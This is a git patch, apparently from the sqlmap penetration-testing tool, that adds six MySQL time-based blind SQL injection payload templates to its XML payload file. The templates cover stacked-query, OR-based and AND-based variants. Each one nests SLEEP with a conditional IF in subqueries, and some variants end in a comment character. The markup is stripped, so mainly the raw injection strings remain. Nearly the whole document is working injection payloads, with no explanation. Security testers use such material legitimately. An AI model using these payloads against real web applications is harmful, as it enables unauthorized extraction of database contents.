From c51ecf33f3351aa8d126ef887ec949cebef4b14d Mon Sep 17 00:00:00 2001 From: Bernardo Damele Date: Wed, 18 Feb 2015 09:45:44 +0000 Subject: [PATCH] ported the recent MySQL time-based payload (introduced with 66c2a7939761a54cefce5aead662bfd2f2716608) to other techniques and conditions --- xml/payloads/00_payloads.xml | 123 +++++++++++++++++++++++++++++++++++ 1 file changed, 123 insertions(+) diff --git a/xml/payloads/00_payloads.xml b/xml/payloads/00_payloads.xml index 8a87dd2b8..17699810f 100644 --- a/xml/payloads/00_payloads.xml +++ b/xml/payloads/00_payloads.xml @@ -1641,6 +1641,47 @@ Tag: + + MySQL > 5.0.11 stacked queries (SELECT) + 4 + 2 + 0 + 0 + 1 + ; (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + + AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + + + + +
+ MySQL + > 5.0.11 +
+
+ + + MySQL > 5.0.11 stacked queries (SELECT - comment) + 5 + 4 + 0 + 0 + 1 + ; (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + + ; (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + # + + + + +
+ MySQL + > 5.0.11 +
+
+ MySQL > 5.0.11 stacked queries 4 @@ -2524,6 +2565,47 @@ Tag: + + MySQL > 5.0.11 OR time-based blind (SELECT) + 5 + 1 + 3 + 1,2,3 + 2 + OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + + OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + + + + +
+ MySQL + > 5.0.11 +
+
+ + + MySQL > 5.0.11 OR time-based blind (SELECT - comment) + 5 + 4 + 3 + 1,2,3 + 2 + OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + + OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + # + + + + +
+ MySQL + > 5.0.11 +
+
+ MySQL > 5.0.11 OR time-based blind 5 @@ -2846,6 +2928,47 @@ Tag: + + MySQL > 5.0.11 AND time-based blind (SELECT) + 5 + 4 + 1 + 1,2,3 + 3 + (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + + (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + + + + +
+ MySQL + > 5.0.11 +
+
+ + + MySQL > 5.0.11 AND time-based blind (SELECT - comment) + 5 + 5 + 1 + 1,2,3 + 3 + (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + + (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + # + + + + +
+ MySQL + > 5.0.11 +
+
+ MySQL >= 5.0 time-based blind - Parameter replace 5